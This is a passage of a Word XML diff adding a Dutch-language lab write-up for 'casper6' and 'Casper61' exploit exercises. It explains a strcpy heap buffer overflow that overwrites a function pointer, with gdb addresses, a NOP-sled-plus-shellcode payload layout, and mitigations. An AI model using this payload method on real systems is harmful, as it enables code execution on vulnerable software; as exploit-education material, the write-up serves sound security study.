+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc25519928"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit programma bevat een </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>heap-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> buffer overflow </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Het is mogelijk om de functie pointer van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>somedata.fp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) te overschrijven. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit is mogelijk omdat de pointer boven de buffer variabele is opgeslagen en er niet gekeken wordt hoeveel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>karakters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> er gekopieerd worden in de buffer. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit laat de aanvaller toe om genoeg data als input te geven om de functie pointer te overschrijven en </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">deze </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">te </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">laten </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wijzen naar eigen geschreven code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc25519927"/>
-      <w:proofErr w:type="spellStart"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc25519929"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Omschrijving</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve">Exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
+        <w:t>beschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Als allereerste zoek ik </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>de lengte van de buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">it kan gedaan worden in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, zoals uitgelegd bij de casper4 exploit. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De adressen van </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>somedata.fp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>somedata.buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> zijn respectievelijk 0x8049bc8 en 0x80497e0. Beide deze adressen wijzen naar de start van de variabele. Door deze van elkaar af te trekken bekomen we de lengte van de buffer, dit is 1000 bytes. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Hierbij moeten nog eens 4 bytes opgeteld worden om de functie pointer te overschrijven.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> In totaal moet de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1004 bytes schrijven.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> In mijn specifieke oplossing ziet dit er als volgt uit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>900 NOP bytes (“x90”)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>21 bytes shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>79 bytes voor opvulling tot de functie pointer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>4 bytes voor het eigenlijke adres</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De overschreven functie pointer wijst nu naar een locatie waar een NOP operaties geschreven staat. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Het programma gaat verder deze operaties overlopen en uiteindelijk de shellcode uitvoeren.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc25519930"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Mitigation</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze aanval kan op v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">erschillende manieren worden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gemitigate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De implementatie van de c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ode kan aangepast worden door gebruik maakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">“ functie met 3 parameters. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze extra parameter geeft het maximum aantal karakters dat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit programma is het maximum gelijk aan 999 karakters.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Een tweede manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van een niet uitvoerbare stack. Dit omdat de eigenlijke </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">geïnjecteerde (input) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>shellcode wordt opgeslagen in de stack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kunnen in dit geval niet gebruikt worden omdat er in deze aanval enkel een functie pointer wordt overschreven en niet helemaal tot aan de return adres.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> derde </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>mitigatie is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van ASLR, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Space </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Layout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Randomization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>. Dit maakt het moeilijker om het correcte adres te specifiëren van de shell code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc25519928"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc25519931"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Vulnerability</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="10"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc25519929"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>beschrijving</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc25519930"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Mitigation</w:t>
+        <w:t>Advanced level: Casper61</w:t>
       </w:r>
       <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc25519931"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Advanced level: Casper61</w:t>
-      </w:r>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit geavanceerde level heeft d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ezelfde structuur als casper6. Het enige verschil is dat de het gebruik maakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>clearEnvironment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie om de environment variabelen te verwijderen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dezelfde exploit als deze van casper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kan gebruikt worden omdat deze oplossing niet gebruik maakt van environment variabelen. Het bevat nog steeds dezelfde </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerabilities</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Enkel het adres in het script moet aangepast worden, dit zijn de laatste 4 bytes. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De reden hiervan is dat het adres van de buffer anders is dan het adres van de buffer van casper6.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -3665,7 +4673,6 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
-    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -4017,6 +5024,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4DCE257F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="4EA6A670"/>
+    <w:lvl w:ilvl="0" w:tplc="10000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="547B4634"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1000001F"/>
@@ -4102,7 +5222,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
